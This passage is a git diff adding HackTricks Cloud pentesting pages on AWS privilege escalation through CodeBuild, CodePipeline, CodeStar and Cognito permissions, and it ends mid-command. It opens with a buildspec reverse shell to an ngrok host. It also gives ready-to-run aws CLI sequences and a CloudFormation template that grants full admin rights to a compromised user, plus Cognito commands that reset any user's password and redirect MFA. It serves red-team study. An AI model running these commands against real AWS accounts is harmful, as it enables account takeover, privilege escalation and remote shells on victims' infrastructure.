+      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
+```
+{% endcode %}
+
+**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges.
+
+{% hint style="warning" %}
+Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload
+{% endhint %}
+
+More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/).
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
new file mode 100644
index 0000000000..d9fdae9de0
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
@@ -0,0 +1,63 @@
+# AWS - Codepipeline Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## codepipeline
+
+For more info about codepipeline check:
+
+{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %}
+[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution`
+
+When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them.
+
+Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...)
+
+I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:<several>`
+
+During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise:
+
+![](<../../../.gitbook/assets/image (276).png>)
+
+![](<../../../.gitbook/assets/image (181).png>)
+
+### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution`
+
+It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions.
+
+### `codepipeline:pollforjobs`
+
+[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html):
+
+> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
new file mode 100644
index 0000000000..106d50e48a
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
@@ -0,0 +1,99 @@
+# AWS - Codestar Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Codestar
+
+You can find more information about codestar in:
+
+{% content-ref url="codestar-createproject-codestar-associateteammember.md" %}
+[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `codestar:CreateProject`
+
+With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page:
+
+{% content-ref url="iam-passrole-codestar-createproject.md" %}
+[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md)
+{% endcontent-ref %}
+
+### `codestar:CreateProject`, `codestar:AssociateTeamMember`
+
+This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**.
+
+```bash
+PROJECT_NAME="supercodestar"
+
+aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
+    --name $PROJECT_NAME \
+    --id $PROJECT_NAME 
+
+echo "Waiting 1min to start the project"
+sleep 60
+
+USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')
+
+aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
+    --project-id $PROJECT_NAME \
+    --user-arn "$USER_ARN" \
+    --project-role "Owner" \
+    --remote-access-allowed
+```
+
+If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`
+
+**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in:
+
+{% content-ref url="codestar-createproject-codestar-associateteammember.md" %}
+[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md)
+{% endcontent-ref %}
+
+### `codestar:CreateProjectFromTemplate`
+
+1. **Create a New Project:**
+   * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.
+     * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.
+     * This access specifically targets a stack associated with the `CodeStarWorker-<generic project name>-CloudFormation` IAM role.
+2. **Update the Target Stack:**
+   * With the granted CloudFormation permissions, proceed to update the specified stack.
+     * The stack's name will typically conform to one of two patterns:
+       * `awscodestar-<generic project name>-infrastructure`
+       * `awscodestar-<generic project name>-lambda`
+       * The exact name depends on the chosen template (referencing the example exploit script).
+3. **Access and Permissions:**
+   * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.
+   * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
+
+For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
+You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)
+
+**Potential Impact:** Privesc to cloudformation IAM role.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
new file mode 100644
index 0000000000..883d19f188
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
@@ -0,0 +1,115 @@
+# codestar:CreateProject, codestar:AssociateTeamMember
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+This is the created policy the user can privesc to (the project name was `supercodestar`):
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "1",
+            "Effect": "Allow",
+            "Action": [
+                "codestar:*",
+                "iam:GetPolicy*",
+                "iam:ListPolicyVersions"
+            ],
+            "Resource": [
+                "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar",
+                "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent",
+                "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
+            ]
+        },
+        {
+            "Sid": "2",
+            "Effect": "Allow",
+            "Action": [
+                "codestar:DescribeUserProfile",
+                "codestar:ListProjects",
+                "codestar:ListUserProfiles",
+                "codestar:VerifyServiceRole",
+                "cloud9:DescribeEnvironment*",
+                "cloud9:ValidateEnvironmentName",
+                "cloudwatch:DescribeAlarms",
+                "cloudwatch:GetMetricStatistics",
+                "cloudwatch:ListMetrics",
+                "codedeploy:BatchGet*",
+                "codedeploy:List*",
+                "codestar-connections:UseConnection",
+                "ec2:DescribeInstanceTypeOfferings",
+                "ec2:DescribeInternetGateways",
+                "ec2:DescribeNatGateways",
+                "ec2:DescribeRouteTables",
+                "ec2:DescribeSecurityGroups",
+                "ec2:DescribeSubnets",
+                "ec2:DescribeVpcs",
+                "events:ListRuleNamesByTarget",
+                "iam:GetAccountSummary",
+                "iam:GetUser",
+                "iam:ListAccountAliases",
+                "iam:ListRoles",
+                "iam:ListUsers",
+                "lambda:List*",
+                "sns:List*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Sid": "3",
+            "Effect": "Allow",
+            "Action": [
+                "codestar:*UserProfile",
+                "iam:GenerateCredentialReport",
+                "iam:GenerateServiceLastAccessedDetails",
+                "iam:CreateAccessKey",
+                "iam:UpdateAccessKey",
+                "iam:DeleteAccessKey",
+                "iam:UpdateSSHPublicKey",
+                "iam:UploadSSHPublicKey",
+                "iam:DeleteSSHPublicKey",
+                "iam:CreateServiceSpecificCredential",
+                "iam:UpdateServiceSpecificCredential",
+                "iam:DeleteServiceSpecificCredential",
+                "iam:ResetServiceSpecificCredential",
+                "iam:Get*",
+                "iam:List*"
+            ],
+            "Resource": [
+                "arn:aws:iam::947247140022:user/${aws:username}"
+            ]
+        }
+    ]
+}
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
new file mode 100644
index 0000000000..60d1b28c4a
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
@@ -0,0 +1,118 @@
+# iam:PassRole, codestar:CreateProject
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**.
+
+To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**:
+
+{% code title="toolchain.json" %}
+```json
+{
+    "Resources": {
+        "supercodestar": {
+            "Type": "AWS::IAM::ManagedPolicy",
+            "Properties": {
+                "ManagedPolicyName": "CodeStar_supercodestar",
+                "PolicyDocument": {
+                    "Version": "2012-10-17",
+                    "Statement": [
+                        {
+                            "Effect": "Allow",
+                            "Action": "*",
+                            "Resource": "*"
+                        }
+                    ]
+                },
+                "Users": [
+                    "<compromised username>"
+                ]
+            }
+        }
+    }
+}
+```
+{% endcode %}
+
+Also **upload** this `empty zip` file to the **bucket**:
+
+{% file src="../../../../.gitbook/assets/empty.zip" %}
+
+Remember that the **bucket with both files must be accessible by the victim account**.
+
+With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project:
+
+```bash
+PROJECT_NAME="supercodestar"
+
+# Crecte the source JSON
+## In this JSON the bucket and key (path) to the empry.zip file is used
+SOURCE_CODE_PATH="/tmp/surce_code.json"
+SOURCE_CODE="[
+    {
+        \"source\": {
+            \"s3\": {
+                \"bucketName\": \"privesc\",
+                \"bucketKey\": \"empty.zip\"
+            }
+    },
+        \"destination\": {
+            \"codeCommit\": {
+                \"name\": \"$PROJECT_NAME\"
+            }
+        }
+    }
+]"
+printf "$SOURCE_CODE" > $SOURCE_CODE_PATH
+
+# Create the toolchain JSON
+## In this JSON the bucket and key (path) to the toolchain.json file is used
+TOOLCHAIN_PATH="/tmp/tool_chain.json"
+TOOLCHAIN="{
+    \"source\": {
+        \"s3\": {
+            \"bucketName\": \"privesc\",
+            \"bucketKey\": \"toolchain.json\"
+        }
+    },
+    \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
+}"
+printf "$TOOLCHAIN" > $TOOLCHAIN_PATH
+
+# Create the codestar project that will use the cloudformation epxloit to privesc
+aws codestar create-project \
+    --name $PROJECT_NAME \
+    --id $PROJECT_NAME \
+    --source-code file://$SOURCE_CODE_PATH \
+    --toolchain file://$TOOLCHAIN_PATH
+```
+
+This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc\_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
new file mode 100644
index 0000000000..fea511a1ea
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
@@ -0,0 +1,342 @@
+# AWS - Cognito Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cognito
+
+For more info about Cognito check:
+
+{% content-ref url="../aws-services/aws-cognito-enum/" %}
+[aws-cognito-enum](../aws-services/aws-cognito-enum/)
+{% endcontent-ref %}
+
+### Gathering credentials from Identity Pool
+
+As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously).
+
+For more information [**check this page**](../aws-unauthenticated-enum-access/#cognito).
+
+**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users).
+
+### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole`
+
+With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app.
+
+```bash
+aws cognito-identity set-identity-pool-roles \
+    --identity-pool-id <identity_pool_id> \
+    --roles unauthenticated=<role ARN>
+
+# Get credentials
+## Get one ID
+aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
+## Get creds for that id
+aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"
+```
+
+If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it.
+
+**Potential Impact:** Direct privesc to any cognito role.
+
+### `cognito-identity:update-identity-pool`
+
+An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**.
+
+```bash
+# This example is using a Cognito User Pool as identity provider
+## but you could use any other identity provider
+aws cognito-identity update-identity-pool \
+    --identity-pool-id <value> \
+    --identity-pool-name <value> \
+    [--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \
+    --cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false
+
+# Now you need to login to the User Pool you have configured
+## after having the id token of the login continue with the following commands:
+
+# In this step you should have already an ID Token
+aws cognito-identity get-id \
+    --identity-pool-id <id_pool_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+
+# Get the identity_id from thr previous commnad response
+aws cognito-identity get-credentials-for-identity \
+    --identity-id <identity_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+```
+
+It's also possible to **abuse this permission to allow basic auth**:
+
+```bash
+aws cognito-identity update-identity-pool \
+    --identity-pool-id <value> \
+    --identity-pool-name <value> \
+    --allow-unauthenticated-identities
+    --allow-classic-flow
+```
+
+**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool.
+
+### `cognito-idp:AdminAddUserToGroup`
+
+This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**:
+
+```bash
+aws cognito-idp admin-add-user-to-group \
+    --user-pool-id <value> \
+    --username <value> \
+    --group-name <value>
+```
+
+**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups.
+
+### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole`
+
+An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles:
+
+{% code overflow="wrap" %}
+```bash
+aws cognito-idp create-group --group-name Hacked --user-pool-id <user-pool-id> --role-arn <role-arn>
+```
+{% endcode %}
+
+**Potential Impact:** Privesc to other Cognito IAM roles.
+
+### `cognito-idp:AdminConfirmSignUp`
+
+This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission.
+
+```bash
+aws cognito-idp admin-confirm-sign-up \
+    --user-pool-id <value> \
+    --username <value>
+```
+
+**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account.
+
+### `cognito-idp:AdminCreateUser`
+
+This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password.
+
+```bash
+aws cognito-idp admin-create-user \
+    --user-pool-id <value> \
+    --username <value> \
+    [--user-attributes <value>] ([Name=email,Value=email@gmail.com])
+    [--validation-data <value>]
+    [--temporary-password <value>]
+```
+
+**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user
+
+### `cognito-idp:AdminEnableUser`
+
+This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**.
+
+```bash
+aws cognito-idp admin-enable-user \
+    --user-pool-id <value> \
+    --username <value>
+```
+
+**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user.
+
+### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`**
+
+This permission allows to login with the [**method ADMIN\_USER\_PASSWORD\_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link.
+
+### `cognito-idp:AdminSetUserPassword`
+
+This permission would allow an attacker to **change the password of any user**, making him able to impersonate any user (that doesn't have MFA enabled).
+
+```bash
+aws cognito-idp admin-set-user-password \
+    --user-pool-id <value> \
+    --username <value> \
+    --password <value> \
+    --permanent
+```
+
+**Potential Impact:** Direct privesc to potentially any user, so access to all the groups each user is member of and access to the Identity Pool authenticated IAM role.
+
+### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool`
+
+**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**.
+
+```bash
+aws cognito-idp admin-set-user-settings \
+    --user-pool-id <value> \
+    --username <value> \
+    --mfa-options <value>
+```
+
+**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection.
+
+```bash
+aws cognito-idp admin-set-user-mfa-preference \
